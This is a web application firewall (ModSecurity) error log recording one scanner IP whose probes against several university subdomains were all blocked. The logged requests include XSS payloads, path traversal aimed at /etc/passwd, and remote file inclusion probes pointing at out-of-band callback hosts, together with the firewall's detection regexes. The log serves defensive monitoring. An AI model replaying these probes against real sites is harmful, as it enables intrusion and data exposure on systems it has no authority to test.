[Tue Aug 29 11:57:18.794191 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmnijtjmimvgniikdb0yc5erukhgjhir.oast.site found within TX:1: cjmnijtjmimvgniikdb0yc5erukhgjhir.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/qards/html2canvasproxy.php"] [unique_id "ZO16rsCo-f0AAAq5@jIAAAAK"]
[Tue Aug 29 11:57:18.795139 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:WaitDuration. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:WaitDuration: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ProcessWait.aspx"] [unique_id "ZO16rsCo-f0AAAm80YoAAAAF"]
[Tue Aug 29 11:57:19.541534 2023] [:error] [pid 2781] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:POBatch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:POBatch: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/ProcessWait.aspx"] [unique_id "ZO16r8Co-f0AAArdQhUAAAAI"]
[Tue Aug 29 11:57:19.600165 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:POBatch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:POBatch: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/ProcessWait.aspx"] [unique_id "ZO16r8Co-f0AAAocypsAAAAR"]
[Tue Aug 29 11:57:19.612822 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:POBatch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:POBatch: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/ProcessWait.aspx"] [unique_id "ZO16r8Co-f0AAAm80Y4AAAAF"]
[Tue Aug 29 11:57:19.638375 2023] [:error] [pid 2783] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:POBatch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:POBatch: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/ProcessWait.aspx"] [unique_id "ZO16r8Co-f0AAArfAXIAAAAP"]
[Tue Aug 29 11:57:20.073068 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmnijtjmimvgniikdb0yyxasaqkw5hc8.oast.site found within TX:1: cjmnijtjmimvgniikdb0yyxasaqkw5hc8.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/qards/html2canvasproxy.php"] [unique_id "ZO16sMCo-f0AAArbWY4AAAAG"]
[Tue Aug 29 11:57:20.583039 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:POBatch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:POBatch: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ProcessWait.aspx"] [unique_id "ZO16sMCo-f0AAAocyp8AAAAR"]
[Tue Aug 29 11:57:20.729438 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:WaitDuration. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:WaitDuration: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/ProcessWait.aspx"] [unique_id "ZO16sMCo-f0AAAqqtvYAAAAA"]
[Tue Aug 29 11:57:22.043950 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:POBatch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:POBatch: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/ProcessWait.aspx"] [unique_id "ZO16ssCo-f0AAAm80aQAAAAF"]
[Tue Aug 29 11:57:23.535160 2023] [:error] [pid 2783] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/>< found within ARGS:type: \\x22/><svg/onload=\\x22alert(document.domain)\\x22/>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/badging/badge_template_v0.php"] [unique_id "ZO16s8Co-f0AAArfAY0AAAAP"]
[Tue Aug 29 11:57:23.587844 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/>< found within ARGS:type: \\x22/><svg/onload=\\x22alert(document.domain)\\x22/>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/badging/badge_template_v0.php"] [unique_id "ZO16s8Co-f0AAAq@spUAAAAM"]
[Tue Aug 29 11:57:23.594803 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/>< found within ARGS:type: \\x22/><svg/onload=\\x22alert(document.domain)\\x22/>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/badging/badge_template_v0.php"] [unique_id "ZO16s8Co-f0AAArbWaMAAAAG"]
[Tue Aug 29 11:57:23.596597 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/>< found within ARGS:type: \\x22/><svg/onload=\\x22alert(document.domain)\\x22/>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/badging/badge_template_v0.php"] [unique_id "ZO16s8Co-f0AAAoz8e4AAAAS"]
[Tue Aug 29 11:57:23.596735 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/>< found within ARGS:type: \\x22/><svg/onload=\\x22alert(document.domain)\\x22/>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/badging/badge_template_v0.php"] [unique_id "ZO16s8Co-f0AAAnEqdgAAAAO"]
[Tue Aug 29 11:57:24.905290 2023] [:error] [pid 2781] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/>< found within ARGS:type: \\x22/><svg/onload=\\x22alert(document.domain)\\x22/>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/badging/badge_template_v0.php"] [unique_id "ZO16tMCo-f0AAArdQjMAAAAI"]
[Tue Aug 29 11:57:25.729844 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:appservlang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:appservlang: <svg/onload=confirm('xss')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16tcCo-f0AAAm80bMAAAAF"]
[Tue Aug 29 11:57:25.848264 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../ found within ARGS:file: /themes/../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/includes/lib/gz.php"] [unique_id "ZO16tcCo-f0AAAqsWEAAAAAB"]
[Tue Aug 29 11:57:25.849607 2023] [:error] [pid 2784] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../ found within ARGS:file: /themes/../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/includes/lib/gz.php"] [unique_id "ZO16tcCo-f0AAArgDvwAAAAE"]
[Tue Aug 29 11:57:25.905093 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../ found within ARGS:file: /themes/../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/includes/lib/gz.php"] [unique_id "ZO16tcCo-f0AAAm80bQAAAAF"]
[Tue Aug 29 11:57:26.159938 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../ found within ARGS:file: /themes/../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/includes/lib/gz.php"] [unique_id "ZO16tsCo-f0AAAoz8f4AAAAS"]
[Tue Aug 29 11:57:26.160400 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:appservlang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:appservlang: <svg/onload=confirm('xss')>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16tsCo-f0AAAqsWEIAAAAB"]
[Tue Aug 29 11:57:26.160575 2023] [:error] [pid 2782] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:appservlang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:appservlang: <svg/onload=confirm('xss')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16tsCo-f0AAArePKcAAAAJ"]
[Tue Aug 29 11:57:26.162828 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:appservlang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:appservlang: <svg/onload=confirm('xss')>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16tsCo-f0AAAocyr8AAAAR"]
[Tue Aug 29 11:57:26.183610 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../ found within ARGS:file: /themes/../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/includes/lib/gz.php"] [unique_id "ZO16tsCo-f0AAAocysAAAAAR"]
[Tue Aug 29 11:57:26.227582 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:appservlang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:appservlang: <svg/onload=confirm('xss')>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16tsCo-f0AAArLLjYAAAAb"]
[Tue Aug 29 11:57:26.708643 2023] [:error] [pid 2782] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../ found within ARGS:file: /themes/../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/includes/lib/gz.php"] [unique_id "ZO16tsCo-f0AAArePLEAAAAJ"]
[Tue Aug 29 11:57:26.917417 2023] [:error] [pid 2786] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:appservlang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:appservlang: <svg/onload=confirm('xss')>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16tsCo-f0AAAriwgYAAAAK"]
[Tue Aug 29 11:57:27.556457 2023] [:error] [pid 2786] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:swfloc. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:swfloc: \\x22><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php"] [unique_id "ZO16t8Co-f0AAAriwgkAAAAK"]
[Tue Aug 29 11:57:27.559412 2023] [:error] [pid 2782] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:swfloc. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:swfloc: \\x22><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri 